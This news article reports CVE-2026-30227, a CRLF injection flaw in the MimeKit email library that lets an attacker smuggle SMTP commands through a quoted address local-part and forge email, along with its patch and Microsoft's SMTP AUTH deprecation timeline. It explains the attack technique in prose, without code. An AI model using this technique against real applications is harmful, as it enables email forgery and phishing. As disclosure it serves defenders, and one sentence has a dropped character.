SAN FRANCISCO — A security vulnerability in MimeKit 4.15.0, a widely used C# library for creating and parsing email messages, allows an attacker to inject arbitrary SMTP commands through a malformed email address, potentially enabling email forgery and unauthorized message delivery. The flaw, registered as CVE-2026-30227, was published on March 6, 2026, and a patch was issued the same day in version 4.15.1.

The Vulnerability

The flaw is a CRLF injection vulnerability in MimeKit 4.15.0 that allows an attacker to embed `\r\n` into the SMTP envelope address local-part, specifically when the local-part is a quoted-string. In plain terms, an attacker can smuggle hidden line breaks into what appears to be a valid email address field, causing an SMTP server to interpret the injected text as new, separate protocol commands.

This is non-compliant with RFC 5321 and can result in SMTP command injection — for example, injecting additional RCPT TO, DATA, or RSET commands — and/or mail header injection, depending on how the application uses MailKit/MimeKit to construct and send messages.

The issue becomes exploitable when the attacker can influence a `MailboxAddress` (MAIL FROM / RCPT TO) value that is later serialized to an SMTP session. This is a realistic scenario in any web application that accepts user-supplied email addresses — such as contact forms, registration flows, or email forwarding services — and passes them to MimeKit without sanitizing control characters.

RFC 5321 explicitly defines the SMTP mailbox local-part grammar and does not permit CR (character 13) or LF (character 10) inside a quoted string. SMTP commands are terminated by “, making CRLF injection in command arguments particularly dangerous.

CVSS Score and Classification

The vulnerability carries a CVSS 3.1 score of `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N` and is classified under CWE-93: Improper Neutralization of CRLF Sequences. The score reflects a network-exploitable, low-complexity attack requiring no privileges and no user interaction. The integrity impact is rated low, meaning the vulnerability does not grant full system access, but it does allow an attacker to manipulate outgoing email traffic in unauthorized ways.

CVE-2026-30227 describes MimeKit as a C# library used for the creation and parsing of messages using the Multipurpose Internet Mail Extension (MIME), as defined by numerous IETF specifications. The library is distributed as a NuGet package and is used across a broad range of .NET applications.

Scope of Exposure

MimeKit is an open source library for creating and parsing MIME, S/MIME, and PGP messages on desktop and mobile platforms. It also supports parsing of Unix mbox files. MimeKit and MailKit support Windows, Linux, Mac, iOS, Android, Windows Phone, and more.

MailKit is an open source cross-platform .NET mail-client library that is based on MimeKit and optimized for mobile devices. Because MailKit depends directly on MimeKit, applications using MailKit for SMTP communication are also potentially exposed to this vulnerability. MailKit boasts over 77.8 million downloads on NuGet, indicating a large installation base across the .NET ecosystem. The reach of CVE-2026-30227 extends to every downstream application that relies on either library to construct SMTP sessions with user-controlled address inputs.

Attack Mechanics

The technique at the root of this vulnerability — CRLF injection — is a well-documented category of attack in SMTP contexts. SMTP injection can occur when an attacker is able to inject arbitrary SMTP commands as part of an SMTP communication taking place between a client and server, often through injecting additional CRLF characters that are part of user-controlled parameters placed as part of an SMTP command without validation or adequate sanitization.

The impact of SMTP injection can vary depending on the context of the affected application. Common impacts include sending copies of emails to a third party, modifying the content of the message being sent to the SMTP server, and leveraging the affected application as a proxy to conduct phishing attacks.

A parallel case from the Java ecosystem illustrates the gravity of this class of vulnerability. In similar CRLF injection scenarios, injected commands sent from a server’s trusted IP address are likely to pass SPF and DKIM checks, making them appear legitimate to the victim’s email client. This means that emails forged through such an exploit can bypass standard authentication filters and land in inboxes as apparently trustworthy messages. Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.

This attack succeeds only if the application lacks proper input validation. Vendors responding to SMTP injection reports have suggested the necessity of input validation on the application side before passing data to the library, because the library’s validation method for email addresses might not catch all possible errors.

The Fix

All versions of MimeKit before 4.15.1 are affected. The recommended remediation is to upgrade to version 4.15.1 or above. The patch was published on March 6, 2026, the same day the advisory was disclosed publicly. Developers using MimeKit or MailKit via NuGet are advised to update their package references immediately.

SMTP injection is a vulnerability often overlooked by developers and open source library maintainers. In most cases, these issues should be remediated by library maintainers, and many well-known libraries — such as JavaMail, PHPMailer, and RubyMail — already prevent SMTP injection by sanitizing CRLF characters.

The advisory for CVE-2026-30227 is tracked under GitHub Security Advisory identifier GHSA-g7hc-96xr-gvvx and is listed in the NVD (National Vulnerability Database), GitLab Advisory Database, and THREATINT’s CVE tracker.

Microsoft Exchange Context

The disclosure of CVE-2026-30227 arrives alongside a separate but related development in the SMTP landscape: Microsoft’s revised deprecation timeline for Basic Authentication in Exchange Online SMTP AUTH.

Originally scheduled for retirement in early 2026, Microsoft published an updated deprecation timeline on January 27, 2026, giving organizations additional time to transition to modern authentication.

Under the revised plan, SMTP AUTH Basic Authentication behavior remains unchanged until December 2026. At the end of December 2026, SMTP AUTH Basic Authentication will be disabled by default for existing tenants, though administrators will still be able to enable it if needed.

New tenants created after December 2026 will not have SMTP AUTH Basic Authentication available by default. In the second half of 2027, Microsoft will announce a final removal date, after which Basic Auth will be permanently blocked with no option to re-enable.

Basic auth is a legacy authentication method that sends usernames and passwords in plain text over the network. This makes it vulnerable to credential theft, phishing, and brute force attacks. To improve the protection of customers and their data, Microsoft is retiring Basic auth from Client Submission (SMTP AUTH) and encouraging customers to use modern authentication methods that are more secure.

SMTP AUTH for Client Submission represents the last major component of Basic Authentication still functioning in Exchange Online, making its pending retirement particularly significant for transactional email systems and automated email sending applications. SMTP AUTH allows applications and scripts to authenticate with SMTP servers and send email on behalf of users — a capability essential for automated email generation, marketing platforms, and business process automation systems.

Background

CRLF injection vulnerabilities in SMTP libraries are not new, but they recur regularly as new implementations or updates introduce insufficiently validated code paths. The SMTP protocol, as defined in RFC 5321, uses the CRLF character sequence to terminate every command line. RFC 5321 clearly states that only CRLF is the SMTP command line separator. Neither a single LF nor CR should occur in the command line. When a library fails to enforce this boundary on user-supplied input, an attacker who controls any part of an address field can terminate one command early and issue a new one — effectively hijacking the SMTP session.

Similar vulnerabilities have previously affected Ruby’s Net::SMTP library, Java’s JavaMail, the Netty SMTP codec, and PHP’s PHPMailer, among others. The recurrence of this vulnerability class across ecosystems reflects the challenge of enforcing protocol-level constraints at every layer of an email software stack.

MimeKit is a .NET Foundation project. It is a .NET MIME creation and parser library with support for S/MIME, PGP, DKIM, TNEF, and Unix mbox spools.

Current Status

The patched version, MimeKit 4.15.1, is available on NuGet. The CVE-2026-30227 advisory is listed in the GitHub Advisory Database under GHSA-g7hc-96xr-gvvx, in the GitLab Advisory Database, and in the NIST National Vulnerability Database. No public exploit code has been confirmed at the time of writing. Organizations running MimeKit 4.15.0 in production environments where user-supplied email addresses are passed to SMTP sessions are advised to apply the update without delay.

Sources

  1. GitLab Advisory Database — *CVE-2026-30227: MimeKit has CRLF Injection in Quoted Local-Part that Enables SMTP Command Injection and Email Forgery* — advisories.gitlab.com
  2. THREATINT — *CVE-2026-30227* — cve.threatint.eu
  3. Microsoft Tech Community — *Updated Exchange Online SMTP AUTH Basic Authentication Deprecation Timeline* — techcommunity.microsoft.com
  4. Microsoft Tech Community — *Exchange Online to retire Basic auth for Client Submission (SMTP AUTH)* — techcommunity.microsoft.com
  5. Snyk — *Avoiding SMTP Injection: A Whitebox Primer* — snyk.io
  6. GitHub Advisory Database — *Netty has SMTP Command Injection Vulnerability that Allows Email Forgery* — github.com/advisories
  7. NuGet Gallery — *MimeKit* — nuget.org
  8. .NET Foundation — *MailKit – Working with Emails* — dotnetfoundation.org
  9. Innovia Consulting — *Microsoft to Retire Basic Auth SMTP for Exchange Online* — innovia.com
  10. Cyberpress — *Exchange Online SMTP AUTH Deprecation Looms – Tenants Urged To Migrate Now* — cyberpress.org
  11. MBSD Technical Whitepaper — *SMTP Injection via Recipient Email Addresses* — mbsd.jp
  12. Debian Security Tracker — *CVE List* — salsa.debian.org
Share: Twitter / X LinkedIn